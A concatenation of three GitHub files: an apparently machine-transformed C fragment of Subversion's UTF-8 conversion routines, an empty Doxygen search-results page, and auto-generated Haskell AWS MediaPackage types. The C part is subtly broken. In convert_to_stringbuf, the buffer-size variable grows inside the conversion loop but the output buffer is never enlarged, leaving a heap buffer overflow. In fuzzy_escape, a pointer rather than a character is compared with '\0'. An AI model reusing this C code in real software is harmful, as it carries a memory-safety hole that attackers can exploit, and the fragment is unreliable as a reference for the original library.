apr_size_t new_len = 0;
char *new;
const char *new_orig;
/* First count how big a dest string we'll need. */
while(src < src_end){
if (!(0 != (svn_ctype_table[(unsigned char )( *src)] & 0x0080)) || ( *src) == '\0') {
/* 5 slots, for "?\XXX" */
new_len += 5;
}
else {
/* one slot for the 7-bit char */
new_len += 1;
}
src++;
}
/* Allocate that amount, plus one slot for '\0' character. */
new = (apr_palloc(pool,new_len + 1));
new_orig = new;
/* And fill it up. */
while(src_orig < src_end){
if (!(0 != (svn_ctype_table[(unsigned char )( *src_orig)] & 0x0080)) || src_orig == '\0') {
/* This is the same format as svn_xml_fuzzy_escape uses, but that
function escapes different characters. Please keep in sync!
### If we add another fuzzy escape somewhere, we should abstract
### this out to a common function. */
apr_snprintf(new,6,"?\\%03u",((unsigned char )( *src_orig)));
new += 5;
}
else {
*new = *src_orig;
new += 1;
}
src_orig++;
}
*new = '\0';
return new_orig;
}
/* Convert SRC_LENGTH bytes of SRC_DATA in NODE->handle, store the result
in *DEST, which is allocated in POOL. */
static svn_error_t *convert_to_stringbuf(xlate_handle_node_t *node,const char *src_data,apr_size_t src_length,svn_stringbuf_t **dest,apr_pool_t *pool)
{
#ifdef WIN32
#else
apr_size_t buflen = src_length * 2;
apr_status_t apr_err;
apr_size_t srclen = src_length;
apr_size_t destlen = buflen;
/* Initialize *DEST to an empty stringbuf.
A 1:2 ratio of input bytes to output bytes (as assigned above)
should be enough for most translations, and if it turns out not
to be enough, we'll grow the buffer again, sizing it based on a
1:3 ratio of the remainder of the string. */
*dest = svn_stringbuf_create_ensure(buflen + 1,pool);
/* Not only does it not make sense to convert an empty string, but
apr-iconv is quite unreasonable about not allowing that. */
if (src_length == 0) {
return 0;
}
do {
/* Set up state variables for xlate. */
destlen = buflen - ( *dest) -> len;
/* Attempt the conversion. */
apr_err = apr_xlate_conv_buffer(node -> handle,src_data + (src_length - srclen),&srclen,( *dest) -> data + ( *dest) -> len,&destlen);
/* Now, update the *DEST->len to track the amount of output data
churned out so far from this loop. */
( *dest) -> len += buflen - ( *dest) -> len - destlen;
/* 3 is middle ground, 2 wasn't enough
for all characters in the buffer, 4 is
maximum character size (currently) */
buflen += srclen * 3;
}while (apr_err == 0 && srclen != 0);
#endif
/* If we exited the loop with an error, return the error. */
if (apr_err) {
const char *errstr;
svn_error_t *err;
/* Can't use svn_error_wrap_apr here because it calls functions in
this file, leading to infinite recursion. */
if (node -> frompage == ((const char *)1)) {
errstr = (apr_psprintf(pool,(dgettext("subversion","Can't convert string from native encoding to '%s':")),node -> topage));
}
else {
if (node -> topage == ((const char *)1)) {
errstr = (apr_psprintf(pool,(dgettext("subversion","Can't convert string from '%s' to native encoding:")),node -> frompage));
}
else {
errstr = (apr_psprintf(pool,(dgettext("subversion","Can't convert string from '%s' to '%s':")),node -> frompage,node -> topage));
}
}
err = svn_error_create(apr_err,((void *)0),fuzzy_escape(src_data,src_length,pool));
return svn_error_create(apr_err,err,errstr);
}
/* Else, exited due to success. Trim the result buffer down to the
right length. */
( *dest) -> data[( *dest) -> len] = '\0';
return 0;
}
/* Return APR_EINVAL if the first LEN bytes of DATA contain anything
other than seven-bit, non-control (except for whitespace) ASCII
characters, finding the error pool from POOL. Otherwise, return
SVN_NO_ERROR. */
static svn_error_t *check_non_ascii(const char *data,apr_size_t len,apr_pool_t *pool)
{
const char *data_start = data;
for (; len > 0; (--len , data++)) {
if (!(0 != (svn_ctype_table[(unsigned char )( *data)] & 0x0080)) || !(0 != (svn_ctype_table[(unsigned char )( *data)] & 0x0002)) && 0 != (svn_ctype_table[(unsigned char )( *data)] & 0x0001)) {
/* Show the printable part of the data, followed by the
decimal code of the questionable character. Because if a
user ever gets this error, she's going to have to spend
time tracking down the non-ASCII data, so we want to help
as much as possible. And yes, we just call the unsafe
data "non-ASCII", even though the actual constraint is
somewhat more complex than that. */
if (data - data_start) {
const char *error_data = (apr_pstrndup(pool,data_start,(data - data_start)));
return svn_error_createf(22,((void *)0),(dgettext("subversion","Safe data '%s' was followed by non-ASCII byte %d: unable to convert to/from UTF-8")),error_data,( *((const unsigned char *)data)));
}
else {
return svn_error_createf(22,((void *)0),(dgettext("subversion","Non-ASCII character (code %d) detected, and unable to convert to/from UTF-8")),( *((const unsigned char *)data)));
}
}
}
return 0;
}
/* Construct an error with code APR_EINVAL and with a suitable message
* to describe the invalid UTF-8 sequence DATA of length LEN (which
* may have embedded NULLs). We can't simply print the data, almost
* by definition we don't really know how it is encoded.
*/
static svn_error_t *invalid_utf8(const char *data,apr_size_t len,apr_pool_t *pool)
{
const char *last = svn_utf__last_valid(data,len);
const char *valid_txt = "";
const char *invalid_txt = "";
apr_size_t i;
size_t valid;
size_t invalid;
/* We will display at most 24 valid octets (this may split a leading
multi-byte character) as that should fit on one 80 character line. */
valid = (last - data);
if (valid > 24) {
valid = 24;
}
for (i = 0; i < valid; ++i)
valid_txt = (apr_pstrcat(pool,valid_txt,apr_psprintf(pool," %02x",((unsigned char )last[i - valid])),((char *)((void *)0))));
/* 4 invalid octets will guarantee that the faulty octet is displayed */
invalid = (data + len - last);
if (invalid > 4) {
invalid = 4;
}
for (i = 0; i < invalid; ++i)
invalid_txt = (apr_pstrcat(pool,invalid_txt,apr_psprintf(pool," %02x",((unsigned char )last[i])),((char *)((void *)0))));
return svn_error_createf(22,((void *)0),(dgettext("subversion","Valid UTF-8 data\n(hex:%s)\nfollowed by invalid UTF-8 sequence\n(hex:%s)")),valid_txt,invalid_txt);
}
/* Verify that the sequence DATA of length LEN is valid UTF-8.
If it is not, return an error with code APR_EINVAL. */
static svn_error_t *check_utf8(const char *data,apr_size_t len,apr_pool_t *pool)
{
if (!svn_utf__is_valid(data,len)) {
return invalid_utf8(data,len,pool);
}
return 0;
}
/* Verify that the NULL terminated sequence DATA is valid UTF-8.
If it is not, return an error with code APR_EINVAL. */
static svn_error_t *check_cstring_utf8(const char *data,apr_pool_t *pool)
{
if (!svn_utf__cstring_is_valid(data)) {
return invalid_utf8(data,strlen(data),pool);
}
return 0;
}
svn_error_t *svn_utf_stringbuf_to_utf8(svn_stringbuf_t **dest,const svn_stringbuf_t *src,apr_pool_t *pool)
{
xlate_handle_node_t *node;
svn_error_t *err;
do {
svn_error_t *svn_err__temp = get_ntou_xlate_handle_node(&node,pool);
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
if (node -> handle) {
err = convert_to_stringbuf(node,(src -> data),src -> len,dest,pool);
if (!err) {
err = check_utf8((( *dest) -> data),( *dest) -> len,pool);
}
}
else {
err = check_non_ascii((src -> data),src -> len,pool);
if (!err) {
*dest = svn_stringbuf_dup(src,pool);
}
}
return svn_error_compose_create(err,put_xlate_handle_node(node,SVN_UTF_NTOU_XLATE_HANDLE,pool));
}
svn_error_t *svn_utf_string_to_utf8(const svn_string_t **dest,const svn_string_t *src,apr_pool_t *pool)
{
svn_stringbuf_t *destbuf;
xlate_handle_node_t *node;
svn_error_t *err;
do {
svn_error_t *svn_err__temp = get_ntou_xlate_handle_node(&node,pool);
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
if (node -> handle) {
err = convert_to_stringbuf(node,src -> data,src -> len,&destbuf,pool);
if (!err) {
err = check_utf8((destbuf -> data),destbuf -> len,pool);
}
if (!err) {
*dest = (svn_stringbuf__morph_into_string(destbuf));
}
}
else {
err = check_non_ascii(src -> data,src -> len,pool);
if (!err) {
*dest = (svn_string_dup(src,pool));
}
}
return svn_error_compose_create(err,put_xlate_handle_node(node,SVN_UTF_NTOU_XLATE_HANDLE,pool));
}
/* Common implementation for svn_utf_cstring_to_utf8,
svn_utf_cstring_to_utf8_ex, svn_utf_cstring_from_utf8 and
svn_utf_cstring_from_utf8_ex. Convert SRC to DEST using NODE->handle as
the translator and allocating from POOL. */
static svn_error_t *convert_cstring(const char **dest,const char *src,xlate_handle_node_t *node,apr_pool_t *pool)
{
if (node -> handle) {
svn_stringbuf_t *destbuf;
do {
svn_error_t *svn_err__temp = convert_to_stringbuf(node,src,strlen(src),&destbuf,pool);
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
*dest = (destbuf -> data);
}
else {
apr_size_t len = strlen(src);
do {
svn_error_t *svn_err__temp = check_non_ascii(src,len,pool);
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
*dest = (apr_pstrmemdup(pool,src,len));
}
return 0;
}
svn_error_t *svn_utf_cstring_to_utf8(const char **dest,const char *src,apr_pool_t *pool)
{
xlate_handle_node_t *node;
svn_error_t *err;
do {
svn_error_t *svn_err__temp = get_ntou_xlate_handle_node(&node,pool);
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
err = convert_cstring(dest,src,node,pool);
do {
svn_error_t *svn_err__temp = svn_error_compose_create(err,put_xlate_handle_node(node,SVN_UTF_NTOU_XLATE_HANDLE,pool));
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
return check_cstring_utf8( *dest,pool);
}
svn_error_t *svn_utf_cstring_to_utf8_ex2(const char **dest,const char *src,const char *frompage,apr_pool_t *pool)
{
xlate_handle_node_t *node;
svn_error_t *err;
const char *convset_key = get_xlate_key(SVN_APR_UTF8_CHARSET,frompage,pool);
do {
svn_error_t *svn_err__temp = get_xlate_handle_node(&node,SVN_APR_UTF8_CHARSET,frompage,convset_key,pool);
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
err = convert_cstring(dest,src,node,pool);
do {
svn_error_t *svn_err__temp = svn_error_compose_create(err,put_xlate_handle_node(node,SVN_UTF_NTOU_XLATE_HANDLE,pool));
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
return check_cstring_utf8( *dest,pool);
}
svn_error_t *svn_utf_cstring_to_utf8_ex(const char **dest,const char *src,const char *frompage,const char *convset_key,apr_pool_t *pool)
{
return svn_utf_cstring_to_utf8_ex2(dest,src,frompage,pool);
}
svn_error_t *svn_utf_stringbuf_from_utf8(svn_stringbuf_t **dest,const svn_stringbuf_t *src,apr_pool_t *pool)
{
xlate_handle_node_t *node;
svn_error_t *err;
do {
svn_error_t *svn_err__temp = get_uton_xlate_handle_node(&node,pool);
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
if (node -> handle) {
err = check_utf8((src -> data),src -> len,pool);
if (!err) {
err = convert_to_stringbuf(node,(src -> data),src -> len,dest,pool);
}
}
else {
err = check_non_ascii((src -> data),src -> len,pool);
if (!err) {
*dest = svn_stringbuf_dup(src,pool);
}
}
err = svn_error_compose_create(err,put_xlate_handle_node(node,SVN_UTF_UTON_XLATE_HANDLE,pool));
return err;
}
svn_error_t *svn_utf_string_from_utf8(const svn_string_t **dest,const svn_string_t *src,apr_pool_t *pool)
{
svn_stringbuf_t *dbuf;
xlate_handle_node_t *node;
svn_error_t *err;
do {
svn_error_t *svn_err__temp = get_uton_xlate_handle_node(&node,pool);
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
if (node -> handle) {
err = check_utf8(src -> data,src -> len,pool);
if (!err) {
err = convert_to_stringbuf(node,src -> data,src -> len,&dbuf,pool);
}
if (!err) {
*dest = (svn_stringbuf__morph_into_string(dbuf));
}
}
else {
err = check_non_ascii(src -> data,src -> len,pool);
if (!err) {
*dest = (svn_string_dup(src,pool));
}
}
err = svn_error_compose_create(err,put_xlate_handle_node(node,SVN_UTF_UTON_XLATE_HANDLE,pool));
return err;
}
svn_error_t *svn_utf_cstring_from_utf8(const char **dest,const char *src,apr_pool_t *pool)
{
xlate_handle_node_t *node;
svn_error_t *err;
do {
svn_error_t *svn_err__temp = check_cstring_utf8(src,pool);
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
do {
svn_error_t *svn_err__temp = get_uton_xlate_handle_node(&node,pool);
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
err = convert_cstring(dest,src,node,pool);
err = svn_error_compose_create(err,put_xlate_handle_node(node,SVN_UTF_UTON_XLATE_HANDLE,pool));
return err;
}
svn_error_t *svn_utf_cstring_from_utf8_ex2(const char **dest,const char *src,const char *topage,apr_pool_t *pool)
{
xlate_handle_node_t *node;
svn_error_t *err;
const char *convset_key = get_xlate_key(topage,SVN_APR_UTF8_CHARSET,pool);
do {
svn_error_t *svn_err__temp = check_cstring_utf8(src,pool);
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
do {
svn_error_t *svn_err__temp = get_xlate_handle_node(&node,topage,SVN_APR_UTF8_CHARSET,convset_key,pool);
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
err = convert_cstring(dest,src,node,pool);
err = svn_error_compose_create(err,put_xlate_handle_node(node,convset_key,pool));
return err;
}
svn_error_t *svn_utf_cstring_from_utf8_ex(const char **dest,const char *src,const char *topage,const char *convset_key,apr_pool_t *pool)
{
return svn_utf_cstring_from_utf8_ex2(dest,src,topage,pool);
}
const char *svn_utf__cstring_from_utf8_fuzzy(const char *src,apr_pool_t *pool,svn_error_t *(*convert_from_utf8)(const char **, const char *, apr_pool_t *))
{
const char *escaped;
const char *converted;
svn_error_t *err;
escaped = fuzzy_escape(src,strlen(src),pool);
/* Okay, now we have a *new* UTF-8 string, one that's guaranteed to
contain only 7-bit bytes :-). Recode to native... */
err = convert_from_utf8(((const char **)(&converted)),escaped,pool);
if (err) {
svn_error_clear(err);
return escaped;
}
else {
return converted;
}
/* ### Check the client locale, maybe we can avoid that second
* conversion! See Ulrich Drepper's patch at
* http://subversion.tigris.org/issues/show_bug.cgi?id=807.
*/
}
const char *svn_utf_cstring_from_utf8_fuzzy(const char *src,apr_pool_t *pool)
{
return svn_utf__cstring_from_utf8_fuzzy(src,pool,svn_utf_cstring_from_utf8);
}
svn_error_t *svn_utf_cstring_from_utf8_stringbuf(const char **dest,const svn_stringbuf_t *src,apr_pool_t *pool)
{
svn_stringbuf_t *destbuf;
do {
svn_error_t *svn_err__temp = svn_utf_stringbuf_from_utf8(&destbuf,src,pool);
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
*dest = (destbuf -> data);
return 0;
}
svn_error_t *svn_utf_cstring_from_utf8_string(const char **dest,const svn_string_t *src,apr_pool_t *pool)
{
svn_stringbuf_t *dbuf;
xlate_handle_node_t *node;
svn_error_t *err;
do {
svn_error_t *svn_err__temp = get_uton_xlate_handle_node(&node,pool);
if (svn_err__temp) {
return svn_err__temp;
}
}while (0);
if (node -> handle) {
err = check_utf8(src -> data,src -> len,pool);
if (!err) {
err = convert_to_stringbuf(node,src -> data,src -> len,&dbuf,pool);
}
if (!err) {
*dest = (dbuf -> data);
}
}
else {
err = check_non_ascii(src -> data,src -> len,pool);
if (!err) {
*dest = (apr_pstrmemdup(pool,src -> data,src -> len));
}
}
err = svn_error_compose_create(err,put_xlate_handle_node(node,SVN_UTF_UTON_XLATE_HANDLE,pool));
return err;
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title></title>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<link rel="stylesheet" type="text/css" href="search.css"/>
<script type="text/javascript" src="search.js"></script>
</head>
<body class="SRPage">
<div id="SRIndex">
<div class="SRStatus" id="NoMatches">No Matches</div>
</div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE RecordWildCards #-}
{-# OPTIONS_GHC -fno-warn-unused-imports #-}
-- Derived from AWS service descriptions, licensed under Apache 2.0.
-- |
-- Module : Network.AWS.MediaPackage.Types.Product
-- Copyright : (c) 2013-2018 Brendan Hay
-- License : Mozilla Public License, v. 2.0.
-- Maintainer : Brendan Hay <[email protected]>
-- Stability : auto-generated
-- Portability : non-portable (GHC extensions)
--
module Network.AWS.MediaPackage.Types.Product where
import Network.AWS.Lens
import Network.AWS.MediaPackage.Types.Sum
import Network.AWS.Prelude
-- | A Channel resource configuration.
--
-- /See:/ 'channel' smart constructor.
data Channel = Channel'
{ _cHlsIngest :: !(Maybe HlsIngest)
, _cARN :: !(Maybe Text)
, _cId :: !(Maybe Text)
, _cDescription :: !(Maybe Text)
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'Channel' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'cHlsIngest' - Undocumented member.
--
-- * 'cARN' - The Amazon Resource Name (ARN) assigned to the Channel.
--
-- * 'cId' - The ID of the Channel.
--
-- * 'cDescription' - A short text description of the Channel.
channel
:: Channel
channel =
Channel'
{ _cHlsIngest = Nothing
, _cARN = Nothing
, _cId = Nothing
, _cDescription = Nothing
}
-- | Undocumented member.
cHlsIngest :: Lens' Channel (Maybe HlsIngest)
cHlsIngest = lens _cHlsIngest (\ s a -> s{_cHlsIngest = a})
-- | The Amazon Resource Name (ARN) assigned to the Channel.
cARN :: Lens' Channel (Maybe Text)
cARN = lens _cARN (\ s a -> s{_cARN = a})
-- | The ID of the Channel.
cId :: Lens' Channel (Maybe Text)
cId = lens _cId (\ s a -> s{_cId = a})
-- | A short text description of the Channel.
cDescription :: Lens' Channel (Maybe Text)
cDescription = lens _cDescription (\ s a -> s{_cDescription = a})
instance FromJSON Channel where
parseJSON
= withObject "Channel"
(\ x ->
Channel' <$>
(x .:? "hlsIngest") <*> (x .:? "arn") <*>
(x .:? "id")
<*> (x .:? "description"))
instance Hashable Channel where
instance NFData Channel where
-- | A Common Media Application Format (CMAF) encryption configuration.
--
-- /See:/ 'cmafEncryption' smart constructor.
data CmafEncryption = CmafEncryption'
{ _ceKeyRotationIntervalSeconds :: !(Maybe Int)
, _ceSpekeKeyProvider :: !SpekeKeyProvider
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'CmafEncryption' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'ceKeyRotationIntervalSeconds' - Time (in seconds) between each encryption key rotation.
--
-- * 'ceSpekeKeyProvider' - Undocumented member.
cmafEncryption
:: SpekeKeyProvider -- ^ 'ceSpekeKeyProvider'
-> CmafEncryption
cmafEncryption pSpekeKeyProvider_ =
CmafEncryption'
{ _ceKeyRotationIntervalSeconds = Nothing
, _ceSpekeKeyProvider = pSpekeKeyProvider_
}
-- | Time (in seconds) between each encryption key rotation.
ceKeyRotationIntervalSeconds :: Lens' CmafEncryption (Maybe Int)
ceKeyRotationIntervalSeconds = lens _ceKeyRotationIntervalSeconds (\ s a -> s{_ceKeyRotationIntervalSeconds = a})
-- | Undocumented member.
ceSpekeKeyProvider :: Lens' CmafEncryption SpekeKeyProvider
ceSpekeKeyProvider = lens _ceSpekeKeyProvider (\ s a -> s{_ceSpekeKeyProvider = a})
instance FromJSON CmafEncryption where
parseJSON
= withObject "CmafEncryption"
(\ x ->
CmafEncryption' <$>
(x .:? "keyRotationIntervalSeconds") <*>
(x .: "spekeKeyProvider"))
instance Hashable CmafEncryption where
instance NFData CmafEncryption where
instance ToJSON CmafEncryption where
toJSON CmafEncryption'{..}
= object
(catMaybes
[("keyRotationIntervalSeconds" .=) <$>
_ceKeyRotationIntervalSeconds,
Just ("spekeKeyProvider" .= _ceSpekeKeyProvider)])
-- | A Common Media Application Format (CMAF) packaging configuration.
--
-- /See:/ 'cmafPackage' smart constructor.
data CmafPackage = CmafPackage'
{ _cpHlsManifests :: !(Maybe [HlsManifest])
, _cpSegmentDurationSeconds :: !(Maybe Int)
, _cpStreamSelection :: !(Maybe StreamSelection)
, _cpEncryption :: !(Maybe CmafEncryption)
, _cpSegmentPrefix :: !(Maybe Text)
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'CmafPackage' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'cpHlsManifests' - A list of HLS manifest configurations
--
-- * 'cpSegmentDurationSeconds' - Duration (in seconds) of each segment. Actual segments will be rounded to the nearest multiple of the source segment duration.
--
-- * 'cpStreamSelection' - Undocumented member.
--
-- * 'cpEncryption' - Undocumented member.
--
-- * 'cpSegmentPrefix' - An optional custom string that is prepended to the name of each segment. If not specified, it defaults to the ChannelId.
cmafPackage
:: CmafPackage
cmafPackage =
CmafPackage'
{ _cpHlsManifests = Nothing
, _cpSegmentDurationSeconds = Nothing
, _cpStreamSelection = Nothing
, _cpEncryption = Nothing
, _cpSegmentPrefix = Nothing
}
-- | A list of HLS manifest configurations
cpHlsManifests :: Lens' CmafPackage [HlsManifest]
cpHlsManifests = lens _cpHlsManifests (\ s a -> s{_cpHlsManifests = a}) . _Default . _Coerce
-- | Duration (in seconds) of each segment. Actual segments will be rounded to the nearest multiple of the source segment duration.
cpSegmentDurationSeconds :: Lens' CmafPackage (Maybe Int)
cpSegmentDurationSeconds = lens _cpSegmentDurationSeconds (\ s a -> s{_cpSegmentDurationSeconds = a})
-- | Undocumented member.
cpStreamSelection :: Lens' CmafPackage (Maybe StreamSelection)
cpStreamSelection = lens _cpStreamSelection (\ s a -> s{_cpStreamSelection = a})
-- | Undocumented member.
cpEncryption :: Lens' CmafPackage (Maybe CmafEncryption)
cpEncryption = lens _cpEncryption (\ s a -> s{_cpEncryption = a})
-- | An optional custom string that is prepended to the name of each segment. If not specified, it defaults to the ChannelId.
cpSegmentPrefix :: Lens' CmafPackage (Maybe Text)
cpSegmentPrefix = lens _cpSegmentPrefix (\ s a -> s{_cpSegmentPrefix = a})
instance FromJSON CmafPackage where
parseJSON
= withObject "CmafPackage"
(\ x ->
CmafPackage' <$>
(x .:? "hlsManifests" .!= mempty) <*>
(x .:? "segmentDurationSeconds")
<*> (x .:? "streamSelection")
<*> (x .:? "encryption")
<*> (x .:? "segmentPrefix"))
instance Hashable CmafPackage where
instance NFData CmafPackage where
-- | A Common Media Application Format (CMAF) packaging configuration.
--
-- /See:/ 'cmafPackageCreateOrUpdateParameters' smart constructor.
data CmafPackageCreateOrUpdateParameters = CmafPackageCreateOrUpdateParameters'
{ _cpcoupHlsManifests :: !(Maybe [HlsManifestCreateOrUpdateParameters])
, _cpcoupSegmentDurationSeconds :: !(Maybe Int)
, _cpcoupStreamSelection :: !(Maybe StreamSelection)
, _cpcoupEncryption :: !(Maybe CmafEncryption)
, _cpcoupSegmentPrefix :: !(Maybe Text)
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'CmafPackageCreateOrUpdateParameters' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'cpcoupHlsManifests' - A list of HLS manifest configurations
--
-- * 'cpcoupSegmentDurationSeconds' - Duration (in seconds) of each segment. Actual segments will be rounded to the nearest multiple of the source segment duration.
--
-- * 'cpcoupStreamSelection' - Undocumented member.
--
-- * 'cpcoupEncryption' - Undocumented member.
--
-- * 'cpcoupSegmentPrefix' - An optional custom string that is prepended to the name of each segment. If not specified, it defaults to the ChannelId.
cmafPackageCreateOrUpdateParameters
:: CmafPackageCreateOrUpdateParameters
cmafPackageCreateOrUpdateParameters =
CmafPackageCreateOrUpdateParameters'
{ _cpcoupHlsManifests = Nothing
, _cpcoupSegmentDurationSeconds = Nothing
, _cpcoupStreamSelection = Nothing
, _cpcoupEncryption = Nothing
, _cpcoupSegmentPrefix = Nothing
}
-- | A list of HLS manifest configurations
cpcoupHlsManifests :: Lens' CmafPackageCreateOrUpdateParameters [HlsManifestCreateOrUpdateParameters]
cpcoupHlsManifests = lens _cpcoupHlsManifests (\ s a -> s{_cpcoupHlsManifests = a}) . _Default . _Coerce
-- | Duration (in seconds) of each segment. Actual segments will be rounded to the nearest multiple of the source segment duration.
cpcoupSegmentDurationSeconds :: Lens' CmafPackageCreateOrUpdateParameters (Maybe Int)
cpcoupSegmentDurationSeconds = lens _cpcoupSegmentDurationSeconds (\ s a -> s{_cpcoupSegmentDurationSeconds = a})
-- | Undocumented member.
cpcoupStreamSelection :: Lens' CmafPackageCreateOrUpdateParameters (Maybe StreamSelection)
cpcoupStreamSelection = lens _cpcoupStreamSelection (\ s a -> s{_cpcoupStreamSelection = a})
-- | Undocumented member.
cpcoupEncryption :: Lens' CmafPackageCreateOrUpdateParameters (Maybe CmafEncryption)
cpcoupEncryption = lens _cpcoupEncryption (\ s a -> s{_cpcoupEncryption = a})
-- | An optional custom string that is prepended to the name of each segment. If not specified, it defaults to the ChannelId.
cpcoupSegmentPrefix :: Lens' CmafPackageCreateOrUpdateParameters (Maybe Text)
cpcoupSegmentPrefix = lens _cpcoupSegmentPrefix (\ s a -> s{_cpcoupSegmentPrefix = a})
instance Hashable CmafPackageCreateOrUpdateParameters
where
instance NFData CmafPackageCreateOrUpdateParameters
where
instance ToJSON CmafPackageCreateOrUpdateParameters
where
toJSON CmafPackageCreateOrUpdateParameters'{..}
= object
(catMaybes
[("hlsManifests" .=) <$> _cpcoupHlsManifests,
("segmentDurationSeconds" .=) <$>
_cpcoupSegmentDurationSeconds,
("streamSelection" .=) <$> _cpcoupStreamSelection,
("encryption" .=) <$> _cpcoupEncryption,
("segmentPrefix" .=) <$> _cpcoupSegmentPrefix])
-- | A Dynamic Adaptive Streaming over HTTP (DASH) encryption configuration.
--
-- /See:/ 'dashEncryption' smart constructor.
data DashEncryption = DashEncryption'
{ _deKeyRotationIntervalSeconds :: !(Maybe Int)
, _deSpekeKeyProvider :: !SpekeKeyProvider
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'DashEncryption' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'deKeyRotationIntervalSeconds' - Time (in seconds) between each encryption key rotation.
--
-- * 'deSpekeKeyProvider' - Undocumented member.
dashEncryption
:: SpekeKeyProvider -- ^ 'deSpekeKeyProvider'
-> DashEncryption
dashEncryption pSpekeKeyProvider_ =
DashEncryption'
{ _deKeyRotationIntervalSeconds = Nothing
, _deSpekeKeyProvider = pSpekeKeyProvider_
}
-- | Time (in seconds) between each encryption key rotation.
deKeyRotationIntervalSeconds :: Lens' DashEncryption (Maybe Int)
deKeyRotationIntervalSeconds = lens _deKeyRotationIntervalSeconds (\ s a -> s{_deKeyRotationIntervalSeconds = a})
-- | Undocumented member.
deSpekeKeyProvider :: Lens' DashEncryption SpekeKeyProvider
deSpekeKeyProvider = lens _deSpekeKeyProvider (\ s a -> s{_deSpekeKeyProvider = a})
instance FromJSON DashEncryption where
parseJSON
= withObject "DashEncryption"
(\ x ->
DashEncryption' <$>
(x .:? "keyRotationIntervalSeconds") <*>
(x .: "spekeKeyProvider"))
instance Hashable DashEncryption where
instance NFData DashEncryption where
instance ToJSON DashEncryption where
toJSON DashEncryption'{..}
= object
(catMaybes
[("keyRotationIntervalSeconds" .=) <$>
_deKeyRotationIntervalSeconds,
Just ("spekeKeyProvider" .= _deSpekeKeyProvider)])
-- | A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
--
-- /See:/ 'dashPackage' smart constructor.
data DashPackage = DashPackage'
{ _dpMinBufferTimeSeconds :: !(Maybe Int)
, _dpProfile :: !(Maybe Profile)
, _dpSegmentDurationSeconds :: !(Maybe Int)
, _dpStreamSelection :: !(Maybe StreamSelection)
, _dpEncryption :: !(Maybe DashEncryption)
, _dpMinUpdatePeriodSeconds :: !(Maybe Int)
, _dpSuggestedPresentationDelaySeconds :: !(Maybe Int)
, _dpManifestWindowSeconds :: !(Maybe Int)
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'DashPackage' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'dpMinBufferTimeSeconds' - Minimum duration (in seconds) that a player will buffer media before starting the presentation.
--
-- * 'dpProfile' - The Dynamic Adaptive Streaming over HTTP (DASH) profile type. When set to "HBBTV_1_5", HbbTV 1.5 compliant output is enabled.
--
-- * 'dpSegmentDurationSeconds' - Duration (in seconds) of each segment. Actual segments will be rounded to the nearest multiple of the source segment duration.
--
-- * 'dpStreamSelection' - Undocumented member.
--
-- * 'dpEncryption' - Undocumented member.
--
-- * 'dpMinUpdatePeriodSeconds' - Minimum duration (in seconds) between potential changes to the Dynamic Adaptive Streaming over HTTP (DASH) Media Presentation Description (MPD).
--
-- * 'dpSuggestedPresentationDelaySeconds' - Duration (in seconds) to delay live content before presentation.
--
-- * 'dpManifestWindowSeconds' - Time window (in seconds) contained in each manifest.
dashPackage
:: DashPackage
dashPackage =
DashPackage'
{ _dpMinBufferTimeSeconds = Nothing
, _dpProfile = Nothing
, _dpSegmentDurationSeconds = Nothing
, _dpStreamSelection = Nothing
, _dpEncryption = Nothing
, _dpMinUpdatePeriodSeconds = Nothing
, _dpSuggestedPresentationDelaySeconds = Nothing
, _dpManifestWindowSeconds = Nothing
}
-- | Minimum duration (in seconds) that a player will buffer media before starting the presentation.
dpMinBufferTimeSeconds :: Lens' DashPackage (Maybe Int)
dpMinBufferTimeSeconds = lens _dpMinBufferTimeSeconds (\ s a -> s{_dpMinBufferTimeSeconds = a})
-- | The Dynamic Adaptive Streaming over HTTP (DASH) profile type. When set to "HBBTV_1_5", HbbTV 1.5 compliant output is enabled.
dpProfile :: Lens' DashPackage (Maybe Profile)
dpProfile = lens _dpProfile (\ s a -> s{_dpProfile = a})
-- | Duration (in seconds) of each segment. Actual segments will be rounded to the nearest multiple of the source segment duration.
dpSegmentDurationSeconds :: Lens' DashPackage (Maybe Int)
dpSegmentDurationSeconds = lens _dpSegmentDurationSeconds (\ s a -> s{_dpSegmentDurationSeconds = a})
-- | Undocumented member.
dpStreamSelection :: Lens' DashPackage (Maybe StreamSelection)
dpStreamSelection = lens _dpStreamSelection (\ s a -> s{_dpStreamSelection = a})
-- | Undocumented member.
dpEncryption :: Lens' DashPackage (Maybe DashEncryption)
